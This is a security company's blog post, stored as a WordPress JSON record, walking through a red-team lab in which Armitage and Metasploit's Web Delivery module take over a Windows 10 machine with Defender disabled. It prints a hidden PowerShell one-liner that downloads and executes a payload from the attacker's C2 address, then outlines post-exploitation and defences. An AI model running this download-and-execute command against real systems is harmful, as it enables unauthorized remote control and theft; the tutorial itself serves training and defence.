{"id":1055,"date":"2020-01-16T18:39:50","date_gmt":"2020-01-16T16:39:50","guid":{"rendered":"https:\/\/fortgale.com\/news\/?p=1055"},"modified":"2026-06-08T22:48:50","modified_gmt":"2026-06-08T22:48:50","slug":"red-teaming-series-armitage","status":"publish","type":"post","link":"https:\/\/fortgale.com\/blog\/emerging-threats\/red-teaming-series-armitage\/","title":{"rendered":"Red Teaming Series \u2014 Armitage"},"content":{"rendered":"<p style=\"text-align: justify\">During a <strong>Red Teaming<\/strong> or <strong>Penetration Testing<\/strong> engagement, ethical hackers\u2014more accurately termed Penetration Testers\u2014conduct authorized computer intrusion activities against an organization&#8217;s systems.<\/p>\n<p style=\"text-align: justify\">How does a Penetration Tester gain control of a system, whether server, workstation, smartphone, or connected device? The attacker must find a method to execute commands or code on the target system.<\/p>\n<p style=\"text-align: justify\">One of the most widely deployed tools in the sector is <strong>Metasploit<\/strong> (though several alternatives exist).<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/fortgale.com\/news\/wp-content\/uploads\/sites\/2\/2020\/01\/msf.png\" alt=\"\" width=\"933\" height=\"733\" class=\"alignnone size-full wp-image-1060\" loading=\"lazy\"><\/p>\n<p><\/p>\n<p style=\"text-align: justify\"><strong>Armitage<\/strong> is a graphical interface that leverages <strong>Metasploit<\/strong> capabilities. The collaboration functionality, implemented via the <em>teamserver<\/em> command, proves particularly useful during team-based operations.<\/p>\n<p style=\"text-align: justify\">Armitage functionality enables:<\/p>\n<ul>\n<li>shared Metasploit session access<\/li>\n<li>shared hosts, data, and files downloaded from target systems<\/li>\n<li>team communication<\/li>\n<li>script creation for automation activities<\/li>\n<\/ul>\n<p><img decoding=\"async\" src=\"https:\/\/fortgale.com\/news\/wp-content\/uploads\/sites\/2\/2020\/01\/maxresdefault.jpg\" alt=\"\" width=\"1280\" height=\"720\" class=\"alignnone size-full wp-image-1063\" loading=\"lazy\"><\/p>\n\n\n\n\n<h2 class=\"wp-block-heading\">Attack Scenario<\/h2>\n\n\n<p style=\"text-align: justify\">In this example, the attacker&#8217;s workstation (Kali Linux) resides within the same network segment as the target (Windows 10).<\/p>\n<table style=\"height: 75px\">\n<tbody>\n<tr style=\"height: 25px\">\n<td style=\"width: 235.556px;height: 25px\"><strong>Subnet:<\/strong><\/td>\n<td style=\"width: 328.889px;height: 25px\"><em>10.0.2.0\/24<\/em><\/td>\n<\/tr>\n<tr style=\"height: 25px\">\n<td style=\"width: 235.556px;height: 25px\"><strong>Kali Linux:<\/strong><\/td>\n<td style=\"width: 328.889px;height: 25px\"><em>10.0.2.15<\/em><\/td>\n<\/tr>\n<tr style=\"height: 25px\">\n<td style=\"width: 235.556px;height: 25px\"><strong>Windows 10:<\/strong><\/td>\n<td style=\"width: 328.889px;height: 25px\"><em>10.0.2.4<\/em><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p style=\"text-align: justify\">Assuming physical access to the Windows workstation and the ability to execute commands, we elected to use PowerShell to execute commands enabling system control via Web Delivery (T1190 &#8211; Exploit Public-Facing Application).<\/p>\n\n\n<h2 class=\"wp-block-heading\">Attacker Configuration (Kali Linux)<\/h2>\n\n\n\n<p style=\"text-align: justify\">For the Kali Linux system, Armitage installation is required:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">root@kali:~# apt update\nroot@kali:~# apt install armitage\nroot@kali:~# msfdb init\nroot@kali:~# service postgresql start\nroot@kali:~# armitage<\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/i1.wp.com\/fortgale.com\/news\/wp-content\/uploads\/sites\/2\/2020\/01\/1.png?fit=750%2C380&amp;ssl=1\" alt=\"\" class=\"wp-image-1057\" loading=\"lazy\" \/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Target Configuration (Windows 10)<\/h2>\n\n\n\n<p style=\"text-align: justify\">For the target system (Windows 10), Windows Defender antivirus was disabled. This is necessary because the PowerShell code would otherwise be immediately flagged as malicious.<\/p>\n<p>It is naturally possible to generate code that circumvents protection systems such as antivirus solutions. This topic will be addressed in a forthcoming article.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Command &amp; Control &#8211; Kali<\/h2>\n\n\n<p style=\"text-align: justify\">The command and control server (also designated C2 or C&amp;C) in this case coincides with the attacker&#8217;s machine and serves as the system for controlling compromised endpoints.<\/p>\n<p style=\"text-align: justify\">For workstation control, we deployed the <strong>Web Delivery<\/strong> module:<\/p>\n<ul style=\"text-align: justify\">\n<li><strong>exploit &gt; multi &gt; script &gt; web delivery<\/strong><\/li>\n<\/ul>\n\n\n<figure class=\"wp-block-gallery columns-2 is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\"><ul class=\"blocks-gallery-grid\"><li class=\"blocks-gallery-item\"><figure><img decoding=\"async\" src=\"https:\/\/i1.wp.com\/fortgale.com\/news\/wp-content\/uploads\/sites\/2\/2020\/01\/11-1.png?fit=750%2C409&amp;ssl=1\" alt=\"\" data-id=\"1073\" data-full-url=\"https:\/\/i1.wp.com\/fortgale.com\/news\/wp-content\/uploads\/sites\/2\/2020\/01\/11-1.png?fit=1575%2C858&amp;ssl=1\" data-link=\"https:\/\/fortgale.com\/news\/?attachment_id=1073\" class=\"wp-image-1073\" loading=\"lazy\" \/><\/figure><\/li><li class=\"blocks-gallery-item\"><figure><img decoding=\"async\" src=\"https:\/\/fortgale.com\/news\/wp-content\/uploads\/sites\/2\/2020\/01\/12.png\" alt=\"\" data-id=\"1074\" data-full-url=\"https:\/\/i0.wp.com\/fortgale.com\/news\/wp-content\/uploads\/sites\/2\/2020\/01\/12.png?fit=878%2C531&amp;ssl=1\" data-link=\"https:\/\/fortgale.com\/news\/?attachment_id=1074\" class=\"wp-image-1074\" loading=\"lazy\" \/><\/figure><\/li><\/ul><\/figure>\n\n\n\n<p><br>PowerShell command:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">powershell.exe -nop -w hidden -c $s=new-object net.webclient;$s.proxy=[Net.WebRequest]::GetSystemWebProxy();$s.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $s.downloadstring('http:\/\/10.0.2.15:8080\/uyyPYd62NNpvHHU'); <\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/i2.wp.com\/fortgale.com\/news\/wp-content\/uploads\/sites\/2\/2020\/01\/13.png?fit=750%2C567&amp;ssl=1\" alt=\"\" class=\"wp-image-1075\" loading=\"lazy\" \/><\/figure>\n\n\n\n<p><br>Result of successful compromise:<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/fortgale.com\/news\/wp-content\/uploads\/sites\/2\/2020\/01\/14.png\" alt=\"\" class=\"wp-image-1076\" loading=\"lazy\" \/><\/figure>\n\n\n\n<p>From this position, both threat actors and penetration testers typically proceed with:<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/i1.wp.com\/fortgale.com\/news\/wp-content\/uploads\/sites\/2\/2020\/01\/smart-1.png?fit=750%2C503&amp;ssl=1\" alt=\"\" class=\"wp-image-1098\" loading=\"lazy\" \/><\/figure>\n\n\n<p style=\"text-align: justify\">This attack phase corresponds to stage 6 &#8220;<strong>Command &amp; Control<\/strong>&#8221; in the <em>Cyber Kill Chain<\/em> framework:<\/p>\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/fortgale.com\/news\/wp-content\/uploads\/sites\/2\/2020\/01\/cyberkillchain.jpg\" alt=\"\" class=\"wp-image-1079\" loading=\"lazy\" \/><\/figure>\n\n\n<p style=\"text-align: justify\">System interaction enables progression to phase 7 of the <em>Cyber Kill Chain<\/em>, &#8220;Actions on Objectives,&#8221; through <strong>system enumeration<\/strong>, domain reconnaissance, browser credential extraction, persistence establishment, lateral movement, and related activities:<\/p>\n\n\n<figure class=\"wp-block-gallery columns-1 is-cropped wp-block-gallery-2 is-layout-flex wp-block-gallery-is-layout-flex\"><ul class=\"blocks-gallery-grid\"><li class=\"blocks-gallery-item\"><figure><img decoding=\"async\" src=\"https:\/\/i1.wp.com\/fortgale.com\/news\/wp-content\/uploads\/sites\/2\/2020\/01\/15-1.png?fit=750%2C601&amp;ssl=1\" alt=\"\" data-id=\"1084\" data-full-url=\"https:\/\/i1.wp.com\/fortgale.com\/news\/wp-content\/uploads\/sites\/2\/2020\/01\/15-1.png?fit=1167%2C935&amp;ssl=1\" data-link=\"https:\/\/fortgale.com\/news\/?attachment_id=1084\" class=\"wp-image-1084\" loading=\"lazy\" \/><\/figure><\/li><\/ul><\/figure>\n\n\n<p><strong>System enumeration<\/strong> constitutes a critical step for understanding context and obtaining detailed information regarding the compromised endpoint:<\/p>\n\n\n<figure class=\"wp-block-gallery columns-2 is-cropped wp-block-gallery-3 is-layout-flex wp-block-gallery-is-layout-flex\"><ul class=\"blocks-gallery-grid\"><li class=\"blocks-gallery-item\"><figure><img decoding=\"async\" src=\"https:\/\/i1.wp.com\/fortgale.com\/news\/wp-content\/uploads\/sites\/2\/2020\/01\/5.png?fit=750%2C352&amp;ssl=1\" alt=\"\" data-id=\"1081\" data-full-url=\"https:\/\/i1.wp.com\/fortgale.com\/news\/wp-content\/uploads\/sites\/2\/2020\/01\/5.png?fit=1302%2C612&amp;ssl=1\" data-link=\"https:\/\/fortgale.com\/news\/?attachment_id=1081\" class=\"wp-image-1081\" loading=\"lazy\" \/><\/figure><\/li><li class=\"blocks-gallery-item\"><figure><img decoding=\"async\" src=\"https:\/\/i0.wp.com\/fortgale.com\/news\/wp-content\/uploads\/sites\/2\/2020\/01\/6.png?fit=750%2C366&amp;ssl=1\" alt=\"\" data-id=\"1082\" data-full-url=\"https:\/\/i0.wp.com\/fortgale.com\/news\/wp-content\/uploads\/sites\/2\/2020\/01\/6.png?fit=1916%2C935&amp;ssl=1\" data-link=\"https:\/\/fortgale.com\/news\/?attachment_id=1082\" class=\"wp-image-1082\" loading=\"lazy\" \/><\/figure><\/li><\/ul><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Conclusions<\/h2>\n\n\n<p style=\"text-align: justify\">The tools and operations described herein represent typical <strong>Red Teaming<\/strong> activities and align with operations conducted by <strong>cyber-criminals<\/strong>. In the latter case, additional layers of complexity emerge from the target environment, protection systems requiring circumvention, and various filtering and restriction mechanisms.<\/p>\n<p style=\"text-align: justify\"><strong>Defense against these attacks is achievable through adoption of specialized technical solutions and expert activities<\/strong>. Infrastructure defense necessarily incorporates:<\/p>\n<ul>\n<li><strong>Protection<\/strong>\n<ul>\n<li><span>Antivirus, firewalls, anti-spam, sandboxes, WAF, and IPS are essential but can be readily circumvented. Continuous monitoring through a <a href=\"https:\/\/fortgale.com\/en\/managed-soc\/\">Managed SOC<\/a> provides detection capabilities that extend beyond perimeter defenses.<\/span><\/li>\n<\/ul>\n<\/li>\n<li><strong>Detection<\/strong>\n<ul>\n<li>Monitoring technologies and threat hunting activities conducted by specialized analysts<\/li>\n<\/ul>\n<\/li>\n<li><strong>Response<\/strong>\n<ul>\n<li>Incident response operations<\/li>\n<\/ul>\n<\/li>\n<\/ul>","protected":false},"excerpt":{"rendered":"<p>Armitage in offensive security operations: post-exploitation workflows, Metasploit collaboration, lateral movement and defensive lessons for SOC teams.<\/p>\n","protected":false},"author":1,"featured_media":1079,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[3218,34,115,225,276,3219,290,293,299],"class_list":["post-1055","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-emerging-threats","tag-adversary-simulation","tag-armitage","tag-detection","tag-metasploit","tag-protezione","tag-purple-teaming","tag-red-teaming","tag-response","tag-risposta"],"_links":{"self":[{"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/posts\/1055","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/comments?post=1055"}],"version-history":[{"count":1,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/posts\/1055\/revisions"}],"predecessor-version":[{"id":9874,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/posts\/1055\/revisions\/9874"}],"wp:attachment":[{"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/media?parent=1055"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/categories?post=1055"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/tags?post=1055"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}